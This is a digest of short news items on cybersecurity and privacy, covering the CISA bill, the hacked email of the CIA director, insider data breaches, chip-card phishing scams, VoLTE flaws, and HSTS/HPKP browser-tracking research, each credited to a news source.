Senate passes CISA, without privacy protection amendments

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someonePrint this page

The Senate on Tuesday passed CISA, a bill encouraging companies to share private user data with the government that is worrying to civil liberties advocates. Four amendments were proposed to address privacy concerns, but they all died on the floor. The Cybersecurity Information Sharing Act was introduced by Sen. Dianne Feinstein, D-Calif., in June 2014 following several high-profile cyber attacks targeting major corporations. It is aimed at protecting user data from falling into the wrong hands. Under the bill, companies would have increased liability protection when collecting and sharing users’ personal information that could potentially be related to security threats. The proposed legislation also makes it easier to share that data with government agencies and with one another. This caused the concern of privacy advocates. Several amendments to address privacy concerns were added to the bill, but they were all voted down. Source: The

CIA director says no one’s information is safe

CIA Brennan_280CIA Director John Brennan says the hack of his personal email account shows that everyone is vulnerable to the compromise of personal information on the Internet. Brennan said he was outraged by the publication of sensitive data, including his contact list and his wife’s Social Security number. The hacker has said he is a high school student protesting U.S. policy. Brennan said he was annoyed that some media accounts suggested impropriety on his part, but he did not cite any particular outlets. The CIA director said he did nothing wrong. Source: CBS News

She fought the law, and the law won

A woman accused of posing as a lawyer and defrauding people of tens of thousands of dollars was ordered to stand trial on 18 counts of grand theft and identity theft. Prosecutor Hector Jimenez described Giuliana Bosco Huerta during her preliminary hearing as someone “very talented at duping people.” Among other things, she’s accused of stealing more than $40,000 from a man after telling him she would set up a trust for his child and a license for his bakery business. According to Jimenez, she built “an aura of credibility” by using made-up bar association member numbers and impersonating other people when sending emails to alleged victims. Some emails were sent while she was out on bail following her arrest in June, he alleged. At a prior hearing, Jimenez alleged the defendant in 2005 scammed people out of $50,000 in a medical diet scheme. Source: The Times of San Diego

If the update is offered, take it

sh_software update_280Cyber experts say you probably should not ignore messages or alerts on your iPhone or Android saying you need to update the system. The devices are full of personal data, and if your phone hasn’t downloaded the newest software update, Green Bay Net co-founder Elliot Christenson says hackers can easily steal your information. “They can remotely exploit your phone. … They can control your phone to send out spam or attack other phones or potentially get your data,” Christenson says. Through Bluetooth, which many people leave on, Christenson says hackers can take what they want without you knowing it. He says that on iPhones, the iOS 9 update fixes a problem with airdrop, a file-sharing feature between Apple devices.  He says there’s risk for Androids, too. “They have similar exploits. And because of the nature of Android, they actually fix them faster, but get them out to customers a little bit slower,” he says. Source: WBAY, Green Bay, Wis.

Giving voice to the bad guys

Researchers can hack voice over LTE implementations on two tier-one mobile carrier networks, gaining access to free data usage or shutting down voice or data access for another user. Academics at the University of California Los Angeles, Ohio State University and Shanghai Jiao Tong University in China outlines a number of vulnerabilities on the device, chipset and network level that made VoLTE hackable, concluding that the “device OS and chipset fail to prohibit non-VoLTE apps from accessing and injecting packets into VoLTE control and data planes. The network infrastructure also lacks proper access control and runtime check. Security for VoLTE, and LTE in general, has been on the telecom industry radar for some time. “The mobile broadband industry’s rapid migration to LTE has opened the door to malicious and nonmalicious threats due to fundamental vulnerabilities in the all-IP LTE architecture,” said Stéphane Téral, principal analyst for mobile infrastructure and carrier economics at Infonetics Research. Source: RCR Wireless

Bad guys chip in with yet another scam

sh_chip-and-PIN card_750Banks and other credit card issuers are adding computer chips to make transactions more secure. But a scam is taking advantage of the transition, the Better Business Bureau warns. People are getting official-looking emails saying a new credit or debit card with a chip is on its way to you. The BBB says these emails look official, using the logos and even the reply address of banks and credit card companies. But from there, you’re asked to follow a link in the email to confirm your banking or personal information — information the bank already has and wouldn’t ask for. Or, you’re instructed to follow a link to continue the process, giving criminals a chance to download software to your computer, which can be used to steal your information, lock up your data for ransom, or use your computer as a server for spreading more spam and malware. Source: ABC8, Richmond

Shoplifting a cart full of data

British supermarket group Morrisons could be sued by 2,000 employees following last year’s data security breach. A disgruntled former employee leaked the employees’ personal details. Andrew Skelton was sentenced to eight years after he was found guilty of stealing and illegally sharing the bank, salary and national insurance details of nearly 10,000 of his former colleagues with news outlets and data-sharing websites. More than 2,000 Morrisons staff are pursuing a group litigation order against the supermarket group following a hearing in London’s High Court. The case has been given a four-month waiting period for other Morrisons staff to join the group claim, represented by JMW Solicitors. Source: The Telegraph

An unhealthy outlook

sh_medical records_750Bon Secours St. Francis Health System in Greenville, S.C., is investigating a data breach by a former employee after they said she accessed nearly 2,000 medical records of patients and about 30 employees. The health system was notified this past August that several employees were getting unpaid balances for an antibiotic cream, and others were reporting their health insurance companies being charged for the antibiotic creams. St. Francis Health performed an audit and found that an employee had accessed the patient information of approximately 1,997 individuals, compromising patient names, dates of birth, driver’s license numbers, insurance information, clinical information, and potentially, Social Security numbers. Authorities have been notified, and the employee has been terminated. Source: Health IT Security

Expanding the security shield across borders

sh_global cybersecurity_750The Federal Trade Commission and enforcement agencies from seven other countries have launched an information-sharing system that will enable them to better coordinate international efforts in protecting consumer privacy. FTC Chairwoman Edith Ramirez joined representatives from several agencies and members of the Global Privacy Enforcement Network in signing a Memorandum of Understanding among users of the new system, called GPEN Alert. “Today, data is increasingly crossing borders, and our privacy investigations and enforcement must do the same,” Ramirez said. “GPEN Alert is an important, practical cooperation tool that will help GPEN authorities protect consumer privacy across the globe.” GPEN Alert is a multilateral system that will enhance coordination by enabling participants to confidentially share information about investigations. Source: Imperial Valley News (Calif.)

Just browsing? That might be a bad idea

sh_browser history_280A researcher has demonstrated two unpatched weaknesses that Web masters can exploit to track millions of people who visit their sites. The attacks allow websites to compile a list of previously visited domains, even when users have flushed their browsing history, and to tag visitors with a tracking cookie that will persist even after users have deleted all normal cookies. The history-sniffing attack works against people who visit sites that use HTTP strict transport (HSTS), which allows websites to instruct browsers to connect only when an encrypted HTTPS connection is available and to reject any attempts to use an unsecured HTTP link. The measure, used by banks, cloud services, and other sensitive sites, is designed to prevent downgrade attacks, in which a hacker with the ability to tamper with traffic passing between an end user and server resets an HTTPS connection to use HTTP so the data isn’t protected. The attack embeds non-existent images from HSTS-protected sites. The unscrupulous website then uses JavaScript to measure how long it takes for an error to register. If the user has visited the HSTS site before, the error will occur within a few milliseconds. If it takes longer for the error to register, the attacker can determine that the site has never been visited before. Zhu also described a way a website can track Google Chrome users even when they delete cookies. Instead of abusing HSTS, the supercookie technique exploits weaknesses in a security measure known as HTTP public key pinning, designed to protect against certificate forgeries by allowing websites to specify the HTTPS credentials that a browser should accept when negotiating all encrypted connections. The specification allows websites to pin multiple certificates to a browser. Unscrupulous sites can abuse the standard by pinning text that’s unique to each visitor. Source: Ars Technica